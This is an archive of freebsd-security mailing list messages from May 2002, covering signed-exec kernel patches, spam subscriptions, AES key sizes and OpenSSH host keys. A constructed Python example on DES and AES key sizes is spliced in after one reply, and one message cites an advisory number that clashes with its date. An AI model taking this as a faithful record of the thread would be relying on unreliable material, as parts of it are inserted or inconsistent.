hub.freebsd.org (Postfix) with ESMTP id B51FA37B405 for ; Sun, 5 May 2002 22:38:11 -0700 (PDT) Received: by smtp.sambolian.net.nz (Postfix, from userid 80) id 5C0DB10A39; Mon, 6 May 2002 17:39:25 +1200 (NZST) Received: from 192.168.0.1 ( [192.168.0.1]) as user andy@imap.sambolian.net.nz by webmail.sambolian.net.nz with HTTP; Mon, 6 May 2002 17:39:25 +1200 Message-ID: <1020663565.3cd6170d34fc7@webmail.sambolian.net.nz> Date: Mon, 6 May 2002 17:39:25 +1200 From: andy@sambolian.net.nz To: freebsd-security@FreeBSD.ORG Subject: Re: Updated Anti-Trojan kernel patches for FreeBSD 5.0 DP1 References: <3CD6100D.1BC0890@netxsecure.net> <20020506051720.GA36741@elvis.mu.org> In-Reply-To: <20020506051720.GA36741@elvis.mu.org> MIME-Version: 1.0 Content-Type: text/plain; 
charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 192.168.0.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think this is what you are after. http://www.trojanproof.org/sigexec.pdf Andrew Quoting Alfred Perlstein : > * Michael A. Williams [020505 22:09] wrote: > > Hi, > > > > Updated kernel option signed_exec patches for FreeBSD 5.0 DP1 Developer > > Preview One are available from: > > > > http://www.trojanproof.org/sigexec-fbsd5.0dp1-0.1.tgz > > > > These patches have been tested against 5.0 DP1 > > For the completely lazy amongst us, can you please provide a url > that _explains_ what these patches do? :) > > -Alfred > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 23:32:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mta3-rme.xtra.co.nz (mta3-rme.xtra.co.nz [210.86.15.131]) by hub.freebsd.org (Postfix) with ESMTP id 680F337B404 for ; Sun, 5 May 2002 23:32:09 -0700 (PDT) Received: from netxsecure.net ([210.55.243.112]) by mta3-rme.xtra.co.nz with ESMTP id <20020506063207.BVII7031.mta3-rme.xtra.co.nz@netxsecure.net>; Mon, 6 May 2002 18:32:07 +1200 Message-ID: <3CD62388.C52BC087@netxsecure.net> Date: Mon, 06 May 2002 18:32:40 +1200 From: "Michael A. 
Williams" Reply-To: mike@netxsecure.net X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: andy@sambolian.net.nz Cc: freebsd-security@FreeBSD.ORG Subject: Re: Updated Anti-Trojan kernel patches for FreeBSD 5.0 DP1 References: <3CD6100D.1BC0890@netxsecure.net> <20020506051720.GA36741@elvis.mu.org> <1020663565.3cd6170d34fc7@webmail.sambolian.net.nz> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Correct, thanks Andrew. BTW without an available SMP for testing I am not convinced that this will behave correctly in an SMP kernel and am almost certain that it will not make good use of SMP. But that is getting away from security. Cheers, Mike. andy@sambolian.net.nz wrote: > > I think this is what you are after. > > http://www.trojanproof.org/sigexec.pdf ... > Quoting Alfred Perlstein : ... > > > Updated kernel option signed_exec patches for FreeBSD 5.0 DP1 Developer > > > Preview One are available from: ... > > For the completely lazy amongst us, can you please provide a url > > that _explains_ what these patches do? :) > > > > -Alfred -- Michael A. 
Williams Security Software Engineering and InfoSec Manager NetXSecure NZ Limited, http://www.nxs.co.nz Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 2:41:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from storm.FreeBSD.org.uk (storm.FreeBSD.org.uk [194.242.139.170]) by hub.freebsd.org (Postfix) with ESMTP id F3BB737B40A for ; Mon, 6 May 2002 02:41:14 -0700 (PDT) Received: from storm.FreeBSD.org.uk (uucp@localhost [127.0.0.1]) by storm.FreeBSD.org.uk (8.12.2/8.12.2) with ESMTP id g469fDVD033411 for ; Mon, 6 May 2002 10:41:13 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Received: (from uucp@localhost) by storm.FreeBSD.org.uk (8.12.2/8.12.2/Submit) with UUCP id g469fDRA033410 for security@FreeBSD.ORG; Mon, 6 May 2002 10:41:13 +0100 (BST) Received: from grimreaper.grondar.org (localhost [127.0.0.1]) by grimreaper.grondar.org (8.12.3/8.12.3) with ESMTP id g469dQoI035632 for ; Mon, 6 May 2002 10:39:26 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Message-Id: <200205060939.g469dQoI035632@grimreaper.grondar.org> To: security@FreeBSD.ORG Subject: Re: Please stop trying to unsubscribe (Was: Re: You've Been Removed!) References: <20020505153746.C35748@malkavian.org> In-Reply-To: <20020505153746.C35748@malkavian.org> ; from "brian j. peterson" "Sun, 05 May 2002 15:37:46 PDT." Date: Mon, 06 May 2002 10:39:26 +0100 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > it'd be nice if people simply stopped loading the unsubscribe link... > since it is also the resubscribe link. every other person trying to > unsubscribe security@freebsd.org from the list has been actually > resubscribing... generating more email... 
leading to another attempt
> to unsubscribe... generating more email... ad nauseam.

Anyone who unsubscribes from spam is deluding themselves. It is verifiable
in very many cases that the unsubscribe route is used for no more than
verifying "live" email addresses for higher-priced resale.

For that reason, unsubscribing mailing lists that you do not own is much
worse.

Can we kill this thread-from-hell now and take it to a spam-discussion
list, _please_?

M
--
o Mark Murray
\_
O.\_ Warning: this .sig is umop ap!sdn

From owner-freebsd-security Mon May 6 2:45: 7 2002
Date: Mon, 6 May 2002 11:44:55 +0200
From: Paulius Bulotas
To: security@freebsd.org
Subject: Re: ipfw
Message-ID: <20020506094455.GA9926@kaktusas.org>

Hello,

On 02 05 04, William J. Borskey wrote:
> is it possible to write rules for ipfw using ethernet addresses instead of
> ip addresses?
http://www.bsdshell.net/hut_ethfw.html Paulius To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 3:11:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from storm.FreeBSD.org.uk (storm.FreeBSD.org.uk [194.242.139.170]) by hub.freebsd.org (Postfix) with ESMTP id ACEF537B406 for ; Mon, 6 May 2002 03:11:36 -0700 (PDT) Received: from storm.FreeBSD.org.uk (uucp@localhost [127.0.0.1]) by storm.FreeBSD.org.uk (8.12.2/8.12.2) with ESMTP id g46ABOVD039278; Mon, 6 May 2002 11:11:24 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Received: (from uucp@localhost) by storm.FreeBSD.org.uk (8.12.2/8.12.2/Submit) with UUCP id g46ABNlh039277; Mon, 6 May 2002 11:11:23 +0100 (BST) Received: from grimreaper.grondar.org (localhost [127.0.0.1]) by grimreaper.grondar.org (8.12.3/8.12.3) with ESMTP id g46AACoI036004; Mon, 6 May 2002 11:10:12 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Message-Id: <200205061010.g46AACoI036004@grimreaper.grondar.org> To: Matthew Dillon Cc: security@FreeBSD.ORG Subject: Re: You've Been Removed! References: <200205060013.g460DYn54044@apollo.backplane.com> In-Reply-To: <200205060013.g460DYn54044@apollo.backplane.com> ; from Matthew Dillon "Sun, 05 May 2002 17:13:34 PDT." Date: Mon, 06 May 2002 11:10:12 +0100 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I think the lists should remain open. A perfect solution would be > to have the mail system keep a database of originators (From: and > the first Received: header). Whenever it sees an email from someone > not in the database it would request that the person acknowledge > that they really intended to send the email and, if they do, their > email goes through and they are added to the database (so it only > asks them once). 
How does that differ from subscription+autodeleting-list-content? > I've been contemplating writing such a beast for myself, since 90% > of the email I receive these days is spam. I'm sure others have > written similar things so I'm wondering if there is a solution out > there already. At some point I'm going to write mine (as a standalone > MX relay so it could be tied into any system), when I have more time > available. Existing mailing list managers can already do this. It effectively makes it easy to join the list, but not receive the list contents. M -- o Mark Murray \_ O.\_ Warning: this .sig is umop ap!sdn #text/plain; name=cv.doc [Mark Murray CV Plain Text] cv.doc #application/octet-stream; name=cv.pdf [Mark Murray CV PDF] cv.pdf To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 5:35:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f98.pav2.hotmail.com [64.4.37.98]) by hub.freebsd.org (Postfix) with ESMTP id DC6A537B404 for ; Mon, 6 May 2002 05:35:32 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 6 May 2002 05:35:32 -0700 Received: from 202.41.224.36 by pv2fd.pav2.hotmail.msn.com with HTTP; Mon, 06 May 2002 12:35:32 GMT X-Originating-IP: [202.41.224.36] From: "Sunil Sunder Raj" To: security@freebsd.org Subject: Postfix smtp relay server Date: Mon, 06 May 2002 18:05:32 +0530 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 06 May 2002 12:35:32.0673 (UTC) FILETIME=[83683310:01C1F4FA] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I have setup postfix on a freebsd 5 server say A. I have virtually hosted some domains on another server say B. I want to use this server as an SMTP RELAY SERVER. FOR EG. 
I have abcd.com hosted on server B I want anything@abcd.com to use server A as an smtp relay server. that is anything@abcd.com should be able to send mails to any server in the world via the SMTP SERVER A. Could some one give me the steps involved. I am a bit confused. THANKS IN ANVANCE. _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 5:57: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mgw1-out.MEIway.com (mgw1.meiway.com [212.73.210.75]) by hub.freebsd.org (Postfix) with ESMTP id B28C437B404 for ; Mon, 6 May 2002 05:57:01 -0700 (PDT) Received: from VirusGate.MEIway.com (virus-gate.meiway.com [212.73.210.91]) by mgw1-out.MEIway.com (Postfix Relay Hub) with ESMTP id 3559338BA9 for ; Mon, 6 May 2002 14:57:00 +0200 (CEST) Received: from localhost (localhost.MEIway.com [127.0.0.1]) by VirusGate.MEIway.com (Postfix) with ESMTP id CA25C5B125 for ; Mon, 6 May 2002 15:09:01 +0200 (CEST) Received: from mail.Go2France.com (ms1.meiway.com [212.73.210.73]) by VirusGate.MEIway.com (Postfix) with ESMTP id 9054E5B124 for ; Mon, 6 May 2002 15:08:59 +0200 (CEST) Received: from LenConrad.Go2France.com [207.224.58.33] by mail.Go2France.com with ESMTP (SMTPD32-6.06) id A322E26022A; Mon, 06 May 2002 15:20:34 +0200 Message-Id: <5.1.0.14.2.20020506075618.038110e8@mail.Go2France.com> X-Sender: LConrad@Go2France.com@mail.Go2France.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Mon, 06 May 2002 07:56:52 -0500 To: freebsd-security@freebsd.org From: Len Conrad Subject: Re: Postfix smtp relay server In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by VirusGate.MEIway.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) 
List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >I want anything@abcd.com to use server A as an smtp relay server. >that is anything@abcd.com should be able to send mails to any server in >the world via the SMTP SERVER A. >Could some one give me the steps involved. >I am a bit confused. see IMGate site in my sig. Len www.menandmice.com/DNS-training : DNS Training BIND8NT.MEIway.com : ISC BIND for NT4 & W2K IMGate.MEIway.com : Build free, hi-perf, anti-abuse mail gateways To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 5:57:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from morgoth.sl.pt (isengard.sl.pt [212.55.140.11]) by hub.freebsd.org (Postfix) with SMTP id 1BF0137B400 for ; Mon, 6 May 2002 05:57:14 -0700 (PDT) Received: (qmail 5085 invoked by uid 500); 6 May 2002 12:53:45 -0000 Date: Mon, 6 May 2002 13:53:45 +0100 From: Jose Celestino To: security@freebsd.org Subject: Re: You've Been Added! 
Message-ID: <20020506125345.GC4963@co.sapo.pt> Mail-Followup-To: security@freebsd.org References: <200205051816.OAA29057@matterhorn.pinn.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="PNTmBPCT7hxwcZjr" Content-Disposition: inline In-Reply-To: <200205051816.OAA29057@matterhorn.pinn.net> User-Agent: Mutt/1.3.28i X-GPG-key-ID/Fingerprint: 0x07B1363B / D3F3 B47B F20C 3B1E 488C B949 1B8B 8141 07B1 363B X-URL: http://xpto.org/~japc X-System: Linux morgoth.sl.pt 2.4.18-pre9 i686 X-By: japc@morgoth.sl.pt X-Location: Ericeira, Portugal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Ok, I must say this is annoying. Is the list admin awake?

Words by Kane Marie Fine Arts Gallery [Sun, May 05, 2002 at 02:16:11PM -0400]:
> This message is to confirm the addition of your
> email address: security@freebsd.org to the
> Kane Marie Fine Arts Gallery
> Subscribe Me mailing list.
>
> If you feel you have received this notice in error,
> please visit the Kane Marie Fine Arts Gallery
> Subscribe Me mailing list
> at our website:
>
> http://www.kanemarie.com
> to remove yourself automatically, or click the link below:
>
> http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org
>
> Thank you,
>
> Kane Marie Fine Arts Gallery

--
Jose Celestino SAPO.pt::Systems http://www.sapo.pt
---------------------------------------------------------------------
Titanic 1912 / Hindenburg Zeppelin 1937 / Microsoft Windows 2000
Linux morgoth.sl.pt 2.4.18-pre9 #5 Wed Feb 20 23:47:45 WET 2002 i686 unknown

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon May 6 6:44:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 7B20C37B412 for ; Mon, 6 May 2002 06:43:41 -0700 (PDT) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g46DdpJ91691 for ; Mon, 6 May 2002 08:39:53 -0500 (CDT) (envelope-from admin@crimelords.org) Date: Mon, 6 May 2002 08:39:51 -0500 (CDT) From: admin To: freebsd-security@freebsd.org Subject: 4.5 stable & tcpip fix maybe?
Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Did any of the last src upgrades make a change that might cause me to get this error... May 5 13:52:05 xXx /kernel: m_retry failed, consider increase mbuf value May 5 13:52:05 xXx /kernel: m_retryhdr failed, consider increase mbuf value May 5 13:52:36 xXx last message repeated 29 times May 5 13:54:37 xXx last message repeated 111 times May 5 13:55:11 xXx last message repeated 31 times I'm guessing I'm just getting DoS'd, but was wondering if this was maybe related to FreeBSD-SA-03:21.tcpip which allowed the remote attacker to exploit the routing table and take up memory thus freezing the system. I ask because I had an uptime over 200+ days and never got these msg's on the last kernel and now I see them quite frequent and don't know where else they could come from. I appear to stay stable and have not been dropped from these errors, but they are rather large and re-occurring. 
-emacs

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon May 6 7:30: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (oe64.pav1.hotmail.com [64.4.30.199]) by hub.freebsd.org (Postfix) with ESMTP id 0DBE337B403 for ; Mon, 6 May 2002 07:30:02 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 6 May 2002 07:30:01 -0700 X-Originating-IP: [207.112.2.1] From: "jack xiao" To: Subject: AES(rijndael) Date: Mon, 6 May 2002 10:26:47 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 06 May 2002 14:30:01.0642 (UTC) FILETIME=[81A1B0A0:01C1F50A] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi All,

I have some questions about AES(rijndael) algorithm. As far as I know, the AES algorithm is capable of using cryptographic keys of 128, 192, and 256 bits to encrypt and decrypt data in blocks of 128 bits.

So I did the following test. I chose DES, 3DES and Blowfish in the Key Encryption and AES in Data Encryption in isakmpd.conf under FreeBSD4.5. The DES key is 64 bits, key of 3DES is 192 bits and Blowfish key varies from 32 bits to 448 bits. Before the test, I guess I can set up the tunnel with 128, 192 or 256 bits key. But to my surprise, I can set up the tunnel with 64 bits key(DES), 448 bits key(Blowfish) besides 128, 192 and 256 bits key. Every time, when I use "setkey -Dv" to show the key after the tunnel is up, the encrypt and decrypt data is in blocks of 128 bits.

Is that to say, AES is capable using more kinds of keys than 128, 192, 256 bits long?
Could you please give me your thoughts?

Thanks.

Jack

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon May 6 8: 4: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from fritz.cc.gt.atl.ga.us (fritz.cc.gt.atl.ga.us [199.77.128.120]) by hub.freebsd.org (Postfix) with ESMTP id C436937B406 for ; Mon, 6 May 2002 08:03:52 -0700 (PDT) Received: from fritz.cc.gt.atl.ga.us (localhost.cc.gt.atl.ga.us [127.0.0.1]) by fritz.cc.gt.atl.ga.us (8.12.3/8.12.3) with ESMTP id g46F6FeX090315; Mon, 6 May 2002 11:06:15 -0400 (EDT) (envelope-from dagon@fritz.cc.gt.atl.ga.us) Received: (from dagon@localhost) by fritz.cc.gt.atl.ga.us (8.12.3/8.12.3/Submit) id g46F6E8n090314; Mon, 6 May 2002 11:06:14 -0400 (EDT) Date: Mon, 6 May 2002 11:06:14 -0400 From: David Dagon To: jack xiao Cc: freebsd-security@FreeBSD.ORG Subject: Re: AES(rijndael) Message-ID: <20020506110614.B90233@fritz.cc.gt.atl.ga.us> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from jack_xiao99@hotmail.com on Mon, May 06, 2002 at 10:26:47AM -0400 X-Echelon: RSA Crypto C4 Mossad CIA BXA Export Control Hello to all the fans of the US Patriot Act Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Mon, May 06, 2002 at 10:26:47AM -0400, jack xiao wrote:
> I have some questions about AES(rijndael) algorithm. As far as I know, the
> AES algorithm is capable of using cryptographic keys of 128, 192, and 256
> bits to encrypt and decrypt data in blocks of 128 bits.

This is correct. With 128 bit keys, there are ~3.4 x 10^38 keys, with 192 bits, there are ~6.2 x 10^57 keys, and 256 bits yields ~1.1 x 10^77.
You can examine a reference implementation from the authors at:

http://csrc.nist.gov/encryption/aes/rijndael/rijndael-unix-refc.tar

and also:

/usr/src/sys/crypto/rijndael

> Is that to say, AES is capable using more kinds of keys than 128,
> 192, 256 bits long? Could you please give me your thoughts?

FYI, DES uses a 64 bit input as a key but only 56 bits are used for the actual key itself. (The other bits are 'parity', or were discarded in the standard to weaken DES, depending on your perspective.) Most modern systems also add salt to increase the strength of DES. FreeBSD has des_cipher(3) that accepts up to 24 bits of salt for ~16M variations on simple DES.

The FIPS 197 standard for AES lists only 128, 192, 256 bit key sizes. While it may be possible to write a program that takes larger keys, one would have to first investigate whether the larger keys would yield expansions/shifts that create congruences, or would then be vulnerable to weak keys, etc.

--
David Dagon              /"\                          "When cryptography
dagon@cc.gatech.edu      \ /  ASCII RIBBON CAMPAIGN    is outlawed, bayl
Georgia Inst. of Tech.    X   AGAINST HTML MAIL        bhgynjf jvyy unir
                         / \                           cevinpl."
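
[Added example, not part of the message above and not FreeBSD or isakmpd code: the key-size rules from the reply, worked through in Python. It goes one step beyond the message by also giving original Rijndael's round formula, Nr = max(Nk, Nb) + 6; the function names and the two sample DES keys are constructed for illustration.]

```python
"""DES and AES/Rijndael key-size rules (added illustration, constructed inputs)."""

AES_KEY_BITS = (128, 192, 256)   # the only key sizes FIPS 197 defines
AES_BLOCK_BITS = 128             # AES fixes the Rijndael block at 128 bits


def rijndael_rounds(key_bits, block_bits=AES_BLOCK_BITS):
    """Rounds for original Rijndael: Nr = max(Nk, Nb) + 6 (sizes in 32-bit words).

    Rijndael defines key and block sizes of 128..256 bits in 32-bit steps;
    no key schedule exists for anything else (e.g. 64 or 448 bits).
    """
    for name, bits in (("key", key_bits), ("block", block_bits)):
        if bits % 32 or not 128 <= bits <= 256:
            raise ValueError(f"{name} size {bits} is not a Rijndael size")
    return max(key_bits // 32, block_bits // 32) + 6


def aes_rounds(key):
    """Check a raw key against FIPS 197 and return its round count."""
    bits = len(key) * 8
    if bits not in AES_KEY_BITS:
        raise ValueError(f"{bits}-bit key: FIPS 197 allows only 128/192/256")
    return rijndael_rounds(bits)


def _require_des_key(key):
    if len(key) != 8:
        raise ValueError("a DES key is passed as 8 bytes (64 bits)")


def des_has_odd_parity(key):
    """True if every byte has an odd number of 1 bits (the DES convention)."""
    _require_des_key(key)
    return all(bin(b).count("1") % 2 == 1 for b in key)


def des_set_odd_parity(key):
    """Rewrite the low bit of each byte so that the byte has odd parity."""
    _require_des_key(key)
    out = bytearray()
    for b in key:
        high7 = b & 0xFE                       # the 7 real key bits
        out.append(high7 | ((bin(high7).count("1") + 1) % 2))
    return bytes(out)


def des_effective_key(key):
    """Drop the parity bit of each byte; return the 56 key bits as an int."""
    _require_des_key(key)
    value = 0
    for b in key:
        value = (value << 7) | (b >> 1)
    return value


if __name__ == "__main__":
    k1 = bytes.fromhex("0123456789abcdef")   # constructed sample, odd parity
    k2 = bytes.fromhex("0022446688aaccee")   # same key bits, parity bits cleared
    print("k1 parity ok:", des_has_odd_parity(k1))
    print("k2 parity ok:", des_has_odd_parity(k2))
    print("same 56-bit key:", des_effective_key(k1) == des_effective_key(k2))
    print("k2 with parity fixed:", des_set_odd_parity(k2).hex())

    # 64 and 448 bits are the DES and maximum Blowfish sizes from the question.
    for bits in (64, 128, 192, 256, 448):
        try:
            rounds = aes_rounds(bytes(bits // 8))
            print(f"{bits:3d}-bit key: AES, {rounds} rounds, "
                  f"~{2 ** bits:.1e} possible keys")
        except ValueError as exc:
            print(f"{bits:3d}-bit key rejected: {exc}")
```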
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon May 6 8:53: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.isternet.sk (smtp.isternet.sk [195.72.0.60]) by hub.freebsd.org (Postfix) with ESMTP id 3843C37B407 for ; Mon, 6 May 2002 08:52:56 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by mailhub.isternet.sk (Postfix) with ESMTP id 914D33CC for ; Mon, 6 May 2002 17:57:28 +0200 (CEST) Received: from branoold (urpin.isternet.sk [195.72.0.1]) by mailhub.isternet.sk (Postfix) with SMTP id 004D43BC for ; Mon, 6 May 2002 17:57:26 +0200 (CEST) Message-ID: <02d301c1f516$63cab840$c28c630a@bb.ubp.sk> From: "[brano]" To: References: Subject: openssh problem Date: Mon, 6 May 2002 17:54:58 +0200 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Virus-Scanned: by AMaViS snapshot-20010714 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi,

I have FreeBSD 4.5-RELEASE

I downloaded newest ports and install openssh (version 3.1)

When I generate new keys for openssh with 4096 bits, I can't connect to server (if I generate keys with 2048 bits, it's working good)

I modified /etc/rc.network

    case ${sshd_enable} in
    [Yy][Ee][Ss])
            if [ ! -f /etc/ssh/ssh_host_key ]; then
                    echo ' creating ssh RSA host key';
                    /usr/bin/ssh-keygen -t rsa1 -b 4096 -N "" -f /etc/ssh/ssh_host_key
            fi
            if [ ! -f /etc/ssh/ssh_host_dsa_key ]; then
                    echo ' creating ssh DSA host key';
                    /usr/bin/ssh-keygen -d -b 4096 -N "" -f /etc/ssh/ssh_host_dsa_key
            fi
            if [ ! -f /etc/ssh/ssh_host_rsa_key ]; then
                    echo ' creating ssh RSA host key';
                    /usr/bin/ssh-keygen -t rsa -b 4096 -N "" -f /etc/ssh/ssh_host_rsa_key
            fi
            ;;
    esac

I modified /etc/ssh/sshd_config remove support for ssh1 and allow only ssh2

when I use SecureCRT 3.4.3 or PenguinNet 1.21, I found this error in /var/log/authlog

    May 6 16:31:26 temne sshd[259]: Received disconnect from xxx.xxx.xxx.xxx: 9: Corrupt or nonexistent host key or algorithm.^M

I use normal username and password via keyboard, any keys or other authentication methods.

Have anyone some idea why it doesn't work ?

Thanks

Brano from Slovakia

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon May 6 8:59:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from laptop.tenebras.com (laptop.tenebras.com [66.92.188.18]) by hub.freebsd.org (Postfix) with SMTP id 14D4737B408 for ; Mon, 6 May 2002 08:59:24 -0700 (PDT) Received: (qmail 34077 invoked from network); 6 May 2002 15:59:23 -0000 Received: from sapphire.tenebras.com (HELO tenebras.com) (66.92.188.241) by 0 with SMTP; 6 May 2002 15:59:23 -0000 Message-ID: <3CD6A85A.4050009@tenebras.com> Date: Mon, 06 May 2002 08:59:22 -0700 From: Michael Sierchio Reply-To: kudzu@tenebras.com User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020427 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Matthew Dillon Cc: Nils Holland , Colin Faber , security@FreeBSD.ORG Subject: Re: You've Been Removed!
References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> <200205060013.g460DYn54044@apollo.backplane.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matthew Dillon wrote: > I think the lists should remain open. A perfect solution would be > to have the mail system keep a database of originators (From: and > the first Received: header). Whenever it sees an email from someone > not in the database it would request that the person acknowledge > that they really intended to send the email and, if they do, their > email goes through and they are added to the database (so it only > asks them once). > > I've been contemplating writing such a beast for myself, since 90% > of the email I receive these days is spam. I'm sure others have > written similar things so I'm wondering if there is a solution out > there already. At some point I'm going to write mine (as a standalone > MX relay so it could be tied into any system), when I have more time > available. Matt - Such a beast exists. I'm running qmail here, w/tcprules, and get about 1 or 2 SPAM a day. The qsecretary function of exmlm does what you describe -- it may be configured to require confirmation of every message sent to the list, or just the first from a given envelope sender, etc. It takes some effort to adopt the Daniel J. Bernstein mindset, but I'm a happy customer, and would be more than happy to assist in setting this up. 
